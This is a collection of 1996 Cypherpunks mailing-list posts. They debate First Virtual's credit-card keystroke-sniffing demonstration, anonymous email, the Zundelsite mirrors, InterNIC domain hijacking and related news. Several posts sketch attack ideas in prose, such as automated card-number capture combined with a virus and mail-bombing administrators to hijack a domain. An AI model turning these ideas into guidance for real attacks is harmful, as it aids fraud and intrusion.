> Virtual ID?  Your attack will capture my ID and allow you to try to use
> it, but the email confirmation will go elsewhere, quite possibly to an
> uninfected machine.  When reproduced on a mass scale, this kind of thing
> will be noticed pretty fast.  In contrast, credit cards are a one-way
> payment mechanism -- the number (and sometimes some other info typed in
> close proximity) is basically all you need.  Just steal that without
> getting noticed and the crime is done.

  With the explosive growth of internet connected PCs, I think that
the number of people who "surf" and read e-mail on different machines
is dwindling rapidly.  I am happy to skip those old guard of the
internet and concentrate on the newbies who only have one computer
and one account.

> >   I believe that FV is just as vulnerable to these types of
> > attacks as any of the encryption based credit card schemes, if
> > not more so.  The thing that really protects FV is that it can
> > only be used to buy bit, not real goods, and the bad guys don't
> > generally care about stealing bits.  This is also what makes FV
> > not generally useful to people who want to shop over the internet.
> 
> Actually, you're a bit behind the times.  We removed that restriction
> from our system a couple of months ago.  There still aren't many people
> using our system for physical goods, mostly because of our 91-day fund
> holding period, but we have gotten the green light from our financial
> partners to waive that for qualified, established merchants, once we
> make a few technical changes behind the scenes.
> 
> The fact is that our original restriction against physical goods was
> never designed to protect against fraud.  Rather, it was a conscious
> attempt to do two things:  1) bound the risk our bank perceived in being
> the first bank ever to explicitly agree to handle an Internet-based
> payment system (this was mid-1994, remember), and 2) to focus the
> attention of our prospective users on the situations that were in fact
> reasonably well-suited to an economic model in which consumers had the
> explicit option of refusing payment.  Some of our sellers very quickly
> realized that no matter what we said, it was straightforward to use our
> system for physical goods, shipping them only after the consumer said
> "yes", and we eventually changed our terms and conditions to reflect
> that reality.  The 91 day hold, on the other hand, WAS designed to
> protect against fraud -- from the *merchant* side, which is why we have
> no qualms about waiving it for qualified merchants.

  Well this means that an attack against First Virtual would be more
interesting.

> Now, actually, I want to commend you.  This is as close as I've ever
> seen anyone come to constructing a plausible automated attack on FV.
> The IP stack is a very clever attack vector, and I honestly can't claim
> to have anticipated it.  However, I do think that the flaw in your
> approach reinforces my belief in the importance of multi-layered
> defenses.  In fact, a multi-layered security strategy is the ONLY
> defense against vulnerabilities you haven't thought of yet.  That's the
> real reason why ANY scheme based on one-way instruments like credit card
> numbers is particularly hard to make secure.  -- Nathaniel

  I still think that someone could construct an attack against the
current FV system using the techniques I've described.  It would be
more complicated to construct than the keyboard attack but that has
been proven time and again not to be a barrier.  Someone who could
construct the Morris worm or the year ago IP spoofing attacks could
do it. 

  I think that you may have to rethink some of your assumptions that
were valid back when you designed the system, but are no longer given
the current growth and changing demographics of the internet.

  I'd really like to see some effort spent on closing some of the more
gaping holes in the underlying systems.  Why should it be so easy
for one program to snoop on the keystrokes directed to another?
Why should it be so easy for a program downloaded from the net
to patch a part of the operating system?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 1 Feb 1996 15:07:22 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: email anonymity alternatives
In-Reply-To: <199602010400.FAA16774@utopia.hacktic.nl>
Message-ID: <199602010643.BAA21255@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Looks like anonymous FAQ time again....

Anonymous writes:
[I added some rational line breaks]
> Are anon remailers the only way to send anon email without giving up the
> source eventhough an organization has a wealth of dough/technology and
> several class B addresses?

No. You don't need "a wealth of dough/technology" either. Basically you just
need to create packets at a sufficiently low level in the protocol stack.
I'd say it's much easier to use a remailer, but then I'm biased. :)

> Couldn't they just trick their mail servers

Indeed, they can have the mail servers under their control emit pretty much
anything. It's nice to be able to launch the packets at a site ostensibly
not under your control, though, so the return path will really be cold.

> And are nym accounts the only way to receive email without giving up who
> the intended recipient of tha mail/news post actually is?

Well, the sender needs to have some useful encoding of the recipient address.
You can hide the address by encrypting it (reply blocks) or you can use an
address you don't need to hide (nym accounts, newsgroups and mailing lists).
I can't think of any other way to do it right now.

Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 1 Feb 1996 22:36:17 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: C'mon, How Hard is it to Write a Virus or Trojan Horse? (was Re: Apology and clarification)
In-Reply-To: <310E0EBE.30FD3BCC@netscape.com>
Message-ID: <31108BA5.30BB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein wrote:
> 
> Excerpts from mail.cypherpunks: 30-Jan-96 Re: Apology and clarification
> Jamie Zawinski@netscape. (4170*)
> 
> > Nathaniel Borenstein wrote:
> > >
> > > What we at FV have done is to demonstrate how easy it is to develop an
> > > FULLY AUTOMATED attack that undermines the security of all
> > > software-based credit card commerce schemes.
> 
> > You have done no such thing.  You have written *one component* of that
> > attack, and the easiest part of it at that.
> 
> > Combine it with a virus, or self-replicating worm, and demonstrate that
> > it is immune to all known virus checkers, and *then* you will have
> > spoken the truth when you say you have "demonstrated" anything.
> 
> This is a particularly fascinating reaction, Jamie.  As I see it, we
> have implemented every part of the attack that we can implement without
> doing anything that is either unethical or illegal.  Is it your position
> that no systematic flaw in your security is real until someone has
> actually broken it?
> 
> Actually, that position would in fact be quite consistent with your
> company's earlier implicit assertion that 40-bit encryption was
> sufficient (for international consumers) until somebody actually broke
> it, even though everyone who understood cryptography already knew
> otherwise.

  Actually that position would in fact be quite inconsistent with our
more recent actions.  For example we have implemented blinding code to
protect against Paul Kocher's timing attack, even though it has
not been demonstrated against any real world system.  I think that you
are misinterpreting the intent of Jamie's posting, but I will let
him defend himself.  I just wanted to say that the company takes
security problems very seriously, even if there has not been an
active exploit.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Thu, 1 Feb 1996 22:28:55 +0800
To: cypherpunks@toad.com
Subject: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
Message-ID: <199602011002.CAA25917@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

OK, I didn't want to sow dissension in the ranks, but this is just too 
much, and Declan has not given a satisfactory response to direct email. 

On Thu, 1 Feb 1996, Timothy C. May wrote:

> At 7:27 AM 2/1/96, sameer wrote:
> >> I guess Declan M. won't be visting France or any of the other EU
> >> countries any time soon!
> >
> >        That reminds me of a question--
> >
> >        If, for example, Germany decides that my company is in
> >violation of their laws for mirroring the Zundelsite, will they send
> >us a letter saying that, so we know not to go to Germany?
> 
> The Nebraska-based neo-Nazi publisher who was picked up in Denmark and
> extradited to Germany pretty much knew his actions were illegal in Germany,
> but I doubt (sheer speculation on my part) he had ever been formally
> notified that an arrest warrant had been issued by Germany and could be
> exercised in Denmark.
> 
> The situation with Declan, Sameer, Duncan, and others, is even less clear.

I disagree. It is clear to me that there is absolutely no cloud hanging 
over us. If any German court tried to press charges against me for 
posting Zendel's materials, they'd be laughed across the Argonne. Most 
mainstream Jewish groups *love* me right now.

I find it curious, and I am beginning to get a little annoyed, that my
name is rarely mentioned, though I set up the first mirror, and Declan got
the files from me. 

I am very annoyed that Declan has not responded to repeated requests to
remove the cleartext "Stanford University" from the parts of his Web site
that mention me. Of course the stanford.edu, or at least net 36.190, will
remain in the URL, but there is no reason that the link text could not say
"Rich Graves' mirror." First Declan sent me mail saying he would respect
my wishes, but he didn't. Then a friend of mine reminded Declan of my
request, and Declan responded with abuse. 

I do not object to the cleartext "Stanford University" because anyone is
pressuring me to remove the page. Far from it; almost every personal
response has been positive, and the student newspaper, at
www-daily.stanford.edu, is going to run a positive story tomorrow or the
next day. Rather, I object simply because I do not represent Stanford
University, and it is an intellectually dishonest abuse of power to
suggest in any way that I do. 

Declan wants me to believe that this disclaimer is enough:

       "Please note that the
       existence of a web site at any particular institution does not
       in any way imply endorsement. Universities and businesses
       do not take responsibility for what their community members
       or customers place online."

This is clearly untrue when the person in question is a staff member, as I
am. Were I still a student, then I could more legitimately say that I'm a
student at Stanford, and that I have the academic freedom to post whatever
I want; but as someone who now merely works for a living at Stanford, I do
whatever I want by the (very) good graces of my (very good) employer. 

Should we have forced Marianne to state her affiliation for the TV cameras
last Saturday? 

> Things are moving much faster now that the Net is the means of
> distribution.

Yes, far too fast. Otherwise good people aren't thinking about what
they're doing in their glee to "fight censorship." 

> I was of course half-joking about Declan visiting Europe, but
> surely France could decide to throw the book at him, and any EU country he
> entered (such as Ireland, judging from his name) could hold him at their
> entry point and ship him off to France to "set an example."

Bullshit.
 
> I suspect the U.S. never officially notified that Monterrey, Mexico alleged
> drug dealer that he was wanted in the U.S., and as other kidnappings of
> foreigners have shown, the U.S. feels it unnecessary to formally announce
> to foreigners that they may be arrested in the U.S. (or kidnapped into the
> U.S.). Thus, I strongly suspect that France will not bother to notify
> Declan or Sameer or any of us that they face arrest in France (or
> affiliated EU countries).
> 
> In Declan's case, I suspect France wants him for the Mitterand book and

France doesn't want anyone for the Mitterand book, which was not, in 
fact, criminally banned. It was censured, not censored, in a civil trial. 
Declan is distorting the facts to suit his ego as Mr. Anti-Censorship.

I find this breast-beating hype embarrassing and dishonest, and I am 
seriously beginning to regret giving the Zundel files to Declan. Had I 
known what he was going to do with them, and how he was going to behave, I 
would have retained closer control.

One mirror site was enough. The German providers would not have blocked
stanford.edu had it remained the only mirror site. The President of
Stanford, Gerhard Casper, is a recognized constitutional scholar from
Germany. The Stanford Provost, Condoleezza Rice, was one of the two or 
three people most responsible for the Bush Administration's policy 
towards German Unification. Dozens of Stanford students have studied in 
Berlin.

Had they blocked stanford.edu, or had they gotten through to Stanford and 
somehow gotten Stanford to force me to take down the pages, then we would 
have set up more mirrors. I would have started, and maybe stopped, 
by setting up mirrors on c2.org and netcom.com. Graduated response. 

Germany has in fact blocked no sites beyond webcom.com. I have the
patience to wait a week for the German political authorities to wake up
and smell the bratwurst. 

Declan is himself becoming a sort of revisionist, loose with the facts.

> Germany wants him for the Zundelsite mirrors. The lesser European countries
> will of course follow their leads.

This is ludicrous. I expect better from you.

> Seriously, Declan, I admire what you've done, but I hope you don't plan to
> leave the U.S. for Europe anytime soon.

This is paranoid bullshit.

Most of the Jewish organizations I have talked to grudgingly applaud the 
Zundelsite mirrors. Some actively applaud them. The Wiesenthal Center, of 
course, is "different." They haven't answered email, and I haven't had 
time to call them.

Censorship is dying, destroyed by truth.

Please don't spoil the party with this paranoid bullshit.

Ernst Zundel is a lying Nazi asshole who wants you to believe that there 
is a Global Jewish Conspiracy to censor him. Fuck him.

Declan, if you don't fix up your page the way I want it by morning (please
not that you have three more hours of morning than I do), I will post a
modified (spell-checked) version of this note on my Web page, to
alt.censorship, and to your "fight-censorship" mailing list.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRCMdY3DXUbM57SdAQGBVgP8DOOtrKoV5bBDEICmRSlokkn91KnKdXXS
231Qv5mEWrrin9Jf8Zj80Zl/gTX/8J08s40v0vQUHi9G8It1hpzAFKz5k8lFZdTW
dbcSyRMDwXz8pHvNxiGyQShZOIs1m/rnO7Z0iiuA0Y9r1+nBqeu1rQSeIyriBFUw
UfWqjk8iWdk=
=cODd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Thu, 1 Feb 1996 15:18:39 +0800
To: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Subject: Re: The FV Problem = A Press Problem
Message-ID: <v02130501ad35f7352cd8@[198.115.179.217]>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles <gbroiles@darkwing.uoregon.edu> opined:

>NSB's messages have suggested, amongst the fear-mongering, that the real
>target of the card-shark publicity campaign is not Joe Consumer but bankers,
>investors, and other "big money" folks; people who care about the
>large-scale fraud rate of credit card use. <snip>

        True enough.  Of course, those are the folks who take the weight
when credit card sales go sour... or the system is victimized by widespread
automated fraud.

>While, as Vin McLellan points out, Simson Garfinkel's articles were
>technically accurate (modulo the quote from Daguio, where he's quoted as
>suggesting an "out of hand" transaction, which is likely either a typo or a
>misunderstanding - dollars to donuts he said "out of band"), they also
>appeared as part of a marketing process.

        Actually, the most striking thing about the Garfinkel articles was
the degree to which he made the First Virtual marketing/propaganda Campaign
against consumer-PC-based credit card encryptors _the focus_ of the Mercury
News articles.

        FV's attack-code demo was overtly presented as a propaganda ploy --
"a direct attack" on Netscape's security model -- by Garfinkel.  There was
nothing in the Merc text that carried the hysterial pitch of the press
release FV posted to C'punks; nothing of the pious Crusade to Save
Electronic Commerce that set everyone teeth on edge.  FV's Stein and
Borenstein were presented as competitive businessmen, out to rough up a
competitor who had been getting too much uncritical attention.  (The long
sidebars on FV's technology are what you'd expect for the Mercury News'
coverage of a local SoCal contender.)

        The Murky News' "Chief Scientist, FV" quote -- Borenstein recalling
audiences in the White House, Treasury, etc., who declared, "We thought
that only the  NSA knew how to do this." -- was absolutely priceless.
Everyone who didn't need a ten-page memo to supply the technical and
historical context got the giggle. It's the Quote of the Week in Silicon
Valley and NoHo.

        Deftly, with a straight face, Garfinkel left Nathaniel standing
there with his pants down, wondering where the draft was coming from.  (Mr.
Borenstein, no slouch on-line, has faired far better in his give and take
among the Cypherpunks -- who in their rabid majority only wanted to lynch
him.)

>....the implication of the Murky News articles, that one [FV] can be
>trusted but not the
>other.... <snip>

>It's a shame that Garfinkel didn't spend more time/column space on
>suggestions or observations from the independent people he interviewed and
>less time on the "hot news - Netscape security broken by a competitor"
>angle.... <snip>

        Your observations had me wondering if we read the same articles.
My thought: would that all  snow jobs were handled by journalists with the
same dry perspicacity!

>We should, however, learn from what FV did right - they wrote software which
>(apparently) had or can have a real political effect. (It seems to have
>worked on Garfinkel, anyway). Cypherpunks write code? FV wrote code and got
>some attention for their otherwise unexciting message.  <snip>

        Now _that's_ a useful and on-target observation.

                                Suerte,
                                                _Vin

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 2 Feb 1996 00:20:49 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
In-Reply-To: <01I0OF2L9QGAA0UO1J@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960201023023.12843C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> from a library's user. Thus, when I made one and got it back from the CIA's
> lending library (yes, they have one), they didn't know who I was...
> fortunately, given the book in question.

      "Petty Officer Smith, route this CP intercept over to Langley 
Internal Security"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Thu, 1 Feb 1996 19:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: C'mon, How Hard is it to Write a Virus or Trojan Horse? (was Re: Apology and clarification)
In-Reply-To: <310E0EBE.30FD3BCC@netscape.com>
Message-ID: <31109E96.4276446A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> 
> I think that you are misinterpreting the intent of Jamie's posting,
> but I will let him defend himself.

Well I'm not particularly interested in arguing about this further
(and I suspect this is true of most people reading this too :-))
but my point was: Nathaniel and crew have implemented the easy part 
(a tiny fraction) of a program which would successfully capture some
large number of credit card numbers.  Nathaniel thinks that what I'm
characterizing as a tiny fraction of the work (the keyboard sniffer and
pattern recogniser) is *most* of the work, and "demonstrates" the
attack.  I said that they have demonstrated nothing without some proof
that combining this with an infection vector would yield the desired
result, because I don't think that infecting some vast number of
credit-card-using computers is any small task; whereas, Nathaniel says
(or at least strongly implies) that it's trivial (or so close to trivial
that it can be taken as a given.)

Nathaniel said:
> As I see it, we have implemented every part of the attack that we can
> implement without doing anything that is either unethical or illegal. 

It's far from clear that you need to do something unethical or illegal
to prove that coupling it with an infection vector would be effective.

For example, you would no doubt agree that evesdropping on some
unsuspecting user's transaction on an exportably-crippled SSL connection
would be immoral.  But it wasn't necessary to do anything immoral to
demonstrate conclusively that such an attack was possible.  It just
required a little creativity, and a lack of handwaving.

> Is it your position that no systematic flaw in your security is real
> until someone has actually broken it?

Of course not.  You don't have to actually break it to show that it's
possible.

Of course, you *do* have to show the likelyhood of success and effort
required to pull it off as well before it's interesting at all, whether
it's theoretically possible or not.

	== Jamie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Thu, 1 Feb 1996 22:18:51 +0800
To: rishab@dxm.org (Rishab Aiyer Ghosh)
Subject: Re: Domain hijacking, InterNIC loopholes
In-Reply-To: <9601301819.AA00964@toad.com>
Message-ID: <199602010926.EAA19923@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I don't think Domain hijacking is a terribly big threat.  First of
all, the modification process insn't fully automated.  Second of all,
it takes several weeks for the changes to go through.  Before the
changes go through, the internic sends out mail to a bunch of people,
including all previous administrators and administrators of all
domains which contain old or new nameservers.

Thus, I'd say the domain modification process is slightly more secure
than First Virtual :-) :-) :-).  It relies on the security of the
network routers and existing nameservers, and requires one or more
active attacks or viruses to defeat.  Probably your best is to wait
for as many as possible of the relevant sysadmins to go on vacation,
and then mail-bomb them rest so hard they end up not reading all of
their real E-mail.  Then again, there's always the possibility that
the domain administrator knows how to use procmail...

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Thu, 1 Feb 1996 22:18:44 +0800
To: David Van Wie <cypherpunks@toad.com
Subject: RE: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <310E7DAE@hamachi>
Message-ID: <199602010938.EAA20003@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Changing the subject doesn't change the point.  Your announcement implies   
> that users are liable, and that is incorrect.  This is misleading, and in   
> my view, reprehensible.  This was the point of my post.  The fact that   
> the fraud is traceable when detected should have been self evident.

I think there is an even stronger point to be made.  We can be
relatively sure that VISA is not going to go out of business any time
soon.  On the other hand, if an E-mail intercepting virus lost FV tons
of money, FV might conceivably go belly up sticking their customers
with the bill.  With FV, there might indeed be a risk to the user.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 12:06:59 +0800
To: cypherpunks@toad.com
Subject: GTE and Cylink ATM Crypto
Message-ID: <199602010340.EAA16216@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



GTE & Cylink Team On Encryption For ATM
     
Washington, D.C., 31 January 1996 -- During a press
conference last night at Comnet, GTE and Cylink unveiled 
InfoGuard 100, a jointly developed offering billed as the
first encryption system able to work with ATM
(asynchronous transfer mode).  

InfoGuard 100 is meant to provide the security needed to 
induce business and government to use ATM public
networks, said Michael M. Guzelian, GTE's marketing
director for broadband systems, speaking at the press
conference.  

GTE is the number one provider of encryption to the
federal government, while Cylink holds a 70 percent share
of the commercial encryption market, according to Kamy
Kavianian, senior product marketing manager at Cylink for
SecureWAN.  

GTE and Cylink will also jointly market the new ATM 
encryption system. "The deal (for InfoGuard 100) is
mutually exclusive, but we don't know anyone else who can
do it," noted Jeff Callo, Cylink's director of business
development.

InfoGuard consists of two main components, according to
the officials. An ATM adapter from GTE provides ATM
interfaces and cell processing and control functions.  

Cylink's CIDEC-VHS contributes "high-speed data
encryption and decryption," in addition to physical
security and "full automated key functions."  

Kavianian told the journalists that InfoGuard 100 is
based on DES encryption. Users of InfoGuard will foil
"key exhaustion," a method used for breaking encryption
codes, if they "change their codes frequently," Guzelian
added. 

Essentially, CIDEC-VHS has turned out to be "the first 
encryption method fast enough to keep up with ATM,"
Guzelian maintained.  

The agreement between Cylink and GTE represents "an 
excellent example of coopetition," Callo said.

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 2 Feb 1996 16:15:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602010400.FAA16774@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Are anon remailers the only way to send anon email without giving up the source eventhough an organization has a wealth of dough/technology and several class B addresses?  Couldn't they just trick their mail servers or would a nslookup/whois defeat that?

And are nym accounts the only way to receive email without giving up who the intended recipient of tha mail/news post actually is?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Feb 1996 19:36:31 +0800
To: sameer <tcmay@got.net (Timothy C. May)
Subject: Re: France to push for international net legislation
Message-ID: <2.2.32.19960201111157.009bffd4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM 1/31/96 -0800, sameer wrote:
>> I guess Declan M. won't be visting France or any of the other EU countries
>> any time soon!
>
>	That reminds me of a question--
>
>	If, for example, Germany decides that my company is in
>violation of their laws for mirroring the Zundelsite, will they send
>us a letter saying that, so we know not to go to Germany?


Don't worry.  If you actually *read* the Zundsite materials, you find out
that the guy who was busted in Denmark and sent to Germany just jumped bail
and is in Florida.  No prob.  The German penal system is a joke.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Feb 1996 03:49:30 +0800
To: cypherpunks@toad.com
Subject: Re: Declan appearing on "Europe's Most Wanted"
Message-ID: <2.2.32.19960201111816.009b2ee4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 AM 2/1/96 -0800, Timothy C. May wrote:

>The situation with Declan, Sameer, Duncan, and others, is even less clear.
>Things are moving much faster now that the Net is the means of
>distribution. I was of course half-joking about Declan visiting Europe, but
>surely France could decide to throw the book at him, and any EU country he
>entered (such as Ireland, judging from his name) could hold him at their
>entry point and ship him off to France to "set an example."

The "modal time served" in Europe for cypherpunks activities is/will be so
low as to be indistinguishable from zero.  If only that was my greatest
legal risk.  Continental legal systems believe in prior restraint so they
make a lot of noise but they are pretty weak in the punishment department.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 13:48:47 +0800
To: cypherpunks@toad.com
Subject: Online Libel Rules
Message-ID: <199602010519.GAA19609@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



UK - New Rules For Online Libel Called For
     
Wokingham, Bershire, England, 31 January 1996 --
CompuServe, Europe Online, and Microsoft Network (MSN),
have banded together to lobby the British Government for
a clear definition of the legal rules for online libel. 

In British law, libel is defined as a defamatory
statement. Because of the "new" nature of online
services, however, online libel is treated as something
of a gray area as regard legal issues.

In a joint submission to the Lord Chancellor's
department, the three online companies claim that online
service providers typically cannot control the content of
messages that users of their services or the Internet,
send.

The companies are recommending that the online service
provider not be held responsible for libels statements
made online, unless the service provider has "reasonable
notice" that a libels statement has been transmitted on
to its system, and "has the ability and the authority 
to prevent" its publication, but "fails to do so" within
a reasonable time.  

According to Andrew Gray, European business manager with
CompuServe, the Chancellor's Department is currently
conducting an extensive review of UK libel law to deal
with a number of current problems. Based upon this
review, the Government is expected to introduce new libel
legislation this spring.

"We applaud the Lord Chancellor's Department's efforts to
bring the defamation law up to date. We hope that the
upcoming legislation will deal effectively with the
problem of libel that takes place over an online service
or the Internet," Gray explained.

Andreas Breijs, manager of Europe Online, meanwhile, said
that online services are not like traditional newspapers
or magazines. "These services are more like a railway
train, where the operator may own the passenger cars, but
has no idea what the passengers may be saying to each
other, and no way of controlling their conversations," he
said.

Judy Gibbons, manager of Microsoft's MSN operating in the
UK, said that the major online providers work hard to run
responsible services. "They should not be penalized for
the actions of unrelated individuals who might happen to
make libelous statements using their services without the
knowledge or consent of the service provider," she said. 

Alistair Kelman, a lawyer specializing in information
technology (IT) affairs, said that he was not surprised
by the online services' request to the Lord Chancellor's
Department, especially given the current situation.  

"There is no case law on this subject and it is likely
that a test case will come sooner, rather than later. The
Government is keen on a clarification on the issue, as it
is itself publishing a lot of its information on the
Internet, in the move towards a more open and IT-relevant
Government," he explained.

Peter Sommer, an IT security specialist and Fellow of the
London School of Economics, said that, far from being
just another publishing medium, it was important that
people understand that the Internet is very similar to a
telephone line.

"If I libel someone over the phone, you're not going to
involve the telephone company, are you? It's the same
with the Internet and some online services. Of course, if
the online service has the ability to remove someone's
comments and does not do it, then it's a different matter
and that is what the definition by the Lord Chancellor's
office is all about," he said.

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 13:41:21 +0800
To: cypherpunks@toad.com
Subject: CRAX Mix Rax
Message-ID: <199602010519.GAA19612@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



European Commission Moves To Stamp Out Racism On Internet
     
Burssels, 31 Jan 1996 -- The European Commission (EC) has
formed a pan-European group to "encourage the mixing of
people of different cultures" from both inside and
outside Europe.  

According to EC officials, the first task of the
Consultative Commission on Racism and Xenophobia (CRAX),
as it is called, will be to investigate and, using legal
means, stamp out the current wave of racism on the
Internet.  

In a prepared statement, CRAX said that it hopes that the
EC "will take all needed measures to prevent the Internet
from becoming a vehicle for the incitement of racist
hatred."  

EC officials are soft-peddling on what legislation they
plan to enact to back up the investigations of CRAX.
Currently, apart from France and Germany, there is no
specific anti-racist legislation.

The laws of France and Germany were created in the
aftermath of the Second World War in order to prevent the
rising of the so-called "Fourth Reich," an extremist
group which posts messages on the Internet, as well as
running Thule bulletin board systems (BBSs) in Germany. 

According to EC officials, the Thule BBSs, which first
appeared in 1991, started spreading the Neo-Nazi word on
the Internet in late 1994, having established themselves
as a means of information exchange in Germany and, to a
limited extent, in France.

As reported previously, the "Thule Network" first came 
to the public's attention when the January, 1994, issue
of Chip magazine (a popular computer monthly in Germany)
claimed to have unearthed eight Thule BBSs.  

According to Chip magazine at the time, "The (Thule)
network distributes information on demonstrations and
invitations to meetings, addresses for contacting parties
and groups, and it reviews and offers books and
magazines. One of the mail-boxes contained instructions
for producing military explosives and letter bombs. A
great deal of space is taken up by 'political
discussions' among the users."

Thule is Norse or Viking terminology for "top of the
world." The Thule Network's name actually derives from
the small, elitist 1920s movement which was considered to
be the Nazi vanguard. Thule movement leaders included
Rudolf Hess. Some BBSs on the Thule network have names
such as "Wolf Box" and "Resistance," while many Internet
messages are signed by people calling themselves "The
Wolf," among other names.

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Thu, 1 Feb 1996 23:03:45 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Declan appearing on "Europe's Most Wanted"
In-Reply-To: <ad35b1f0060210043fc3@[205.199.118.202]>
Message-ID: <199602011430.GAA11531@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> Seriously, Declan, I admire what you've done, but I hope you don't plan to
> leave the U.S. for Europe anytime soon.
> 
> --Tim

I guess this sort of thing does involve extradition rules. For example,
Sweden has a Nazi party, which would offend Germans, who can, I'm
sure, see them on TV leave alone on the Net. Sweden's Information
(or something) Ministry has said that by law anyone can start
a party, but if the Nazis due something illegal (such as killing
people, or threatening them) the courts will handle it.

And Norway is not even _in_ the EU.

Rishab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Fri, 2 Feb 1996 15:14:50 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Domain hijacking, InterNIC loopholes
In-Reply-To: <199602010926.EAA19923@amsterdam.lcs.mit.edu>
Message-ID: <199602011457.GAA29387@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



David Mazieres wrote:
> I don't think Domain hijacking is a terribly big threat.  First of
> all, the modification process insn't fully automated.  Second of all,
> it takes several weeks for the changes to go through.  Before the

My new ISP got the domain modified in a day, or so. The proces
_is_ automated, as long as you follow the template perfectly.

> changes go through, the internic sends out mail to a bunch of people,
> including all previous administrators and administrators of all
> domains which contain old or new nameservers.

More to the point, the InterNIC informs all the major nameservers
(such as ns.nasa.gov and all those that mirror ns.internic.net). 
Obviously. Without that, how would anyone know where to find your
domain (even if 'hijacked')? But I never did say domain hijacking
was a security threat - unlike spoofing, this can't in itself
compromise your systems. But, as the InterNIC admits, it can 
have "serious consequences" on commercial organisations, for whom
the loss of net presence for even a day could be considerable.

> Thus, I'd say the domain modification process is slightly more secure
> than First Virtual :-) :-) :-).  It relies on the security of the
> network routers and existing nameservers, and requires one or more
> active attacks or viruses to defeat.  Probably your best is to wait

You obviously didn't get the point. There are no routers involved
at all, or even nameservers. The Internet domain registry structure
(unlike much else) is strictly hierarchic - the InterNIC is the source
of all. Modify the InterNIC record, and the new record is official,
and will be promptly accepted by all the nameservers that bother to track 
these things.

> for as many as possible of the relevant sysadmins to go on vacation,
> and then mail-bomb them rest so hard they end up not reading all of
> their real E-mail.  Then again, there's always the possibility that
> the domain administrator knows how to use procmail...

Again, whether the sysadmin eventually catches on is not the point.
Unless the hijacker is exceptionally sophisticated (by, for
example, not interrupting but only intercepting web and mail 
traffic) and the victim exceptionally stupid, the truth will be
known soon. But perhaps not soon enough for, say, Hotwired or
